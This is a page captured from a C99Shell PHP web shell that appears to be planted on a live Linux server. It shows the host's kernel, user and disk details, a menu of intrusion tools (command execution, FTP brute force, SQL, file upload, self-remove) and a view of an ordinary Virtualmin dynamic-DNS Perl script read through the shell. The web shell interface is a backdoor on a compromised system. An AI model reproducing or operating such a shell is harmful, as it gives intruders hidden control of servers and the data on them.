!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/virtual-server/   drwxrwxr-x
Free 28.64 GB of 117.98 GB (24.27%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     dynip.pl (2.5 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Update the configured dynamic DNS service

package virtual_server;
$main::no_acl_check++;
$no_virtualmin_plugins = 1;
require './virtual-server-lib.pl';
&foreign_require("mailboxes");

exit(1) if (!$config{'dynip_service'});

$h = &get_system_hostname();
($svc) = grep { $_->{'name'} eq $config{'dynip_service'} }
          &list_dynip_services();
$from = &get_global_from_address();

# Check if we need to update
($oldip, $oldwhen) = &get_last_dynip_update($config{'dynip_service'});
$newip = $config{'dynip_auto'} ? &get_external_ip_address()
                   : &get_default_ip();
if (!$newip) {
    # Failed to get current IP address .. so do nothing
    print STDERR "Failed to get current IP address\n";
    exit(0);
    }
if ($oldip ne $newip || $oldwhen < time()-28*24*60*60) {
    # Talk to the dynamic IP service, as our IP has changed or we
    # haven't reported in for a month
    ($ip, $err) = &update_dynip_service($newip, $oldip);
    if (!$err && $ip && !&check_ipaddress($ip)) {
        # Got an response, but it's not a valid IP
        $err = "Invalid response : $ip";
        }
    if ($err) {
        # Failed .. tell the user
        if ($config{'dynip_email'}) {
            &mailboxes::send_text_mail(
                $from,
                $config{'dynip_email'},
                undef,
                "Virtualmin dynamic IP update FAILED",
                join("\n", &mailboxes::wrap_lines(
                    "An attempt to update the dynamic IP ".
                    "for $h to $newip with ".
                    "$svc->{'desc'} failed: $err\n", 75)).
                "Sent by Virtualmin at: ".
                    &get_virtualmin_url()."\n"
                );
            }
        exit(1);
        }
    }

# Save and tell the user
if ($ip) {
    &set_last_dynip_update($config{'dynip_service'}, $ip);
    }
if ($ip && $ip ne $oldip) {
    # Fix up any virtual servers using the old IP
    if ($oldip) {
        &set_all_null_print();
        $dc = &update_all_domain_ip_addresses($ip, $oldip);

        # Also change shared IP
        @shared = &list_shared_ips();
        $idx = &indexof($oldip, @shared);
        if ($idx >= 0) {
            $shared[$idx] = $ip;
            &save_shared_ips(@shared);
            }

        # Update any DNS slaves that were replicating from this IP
        &update_dns_slave_ip_addresses($ip, $oldip);

        &run_post_actions();
        }

    if ($config{'dynip_email'}) {
        # Email the user
        $dc ||= "No";
        &mailboxes::send_text_mail(
            $from,
            $config{'dynip_email'},
            undef,
            "Virtualmin dynamic IP update",
            join("\n", &mailboxes::wrap_lines(
                "The IP address of $h has been successfully ".
                "updated to $ip with $svc->{'desc'}. $dc ".
                "virtual servers have been configured to use ".
                "the new IP address\n", 75))."\n".
            "Sent by Virtualmin at: ".&get_virtualmin_url()."\n"
            );
        }
    }


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--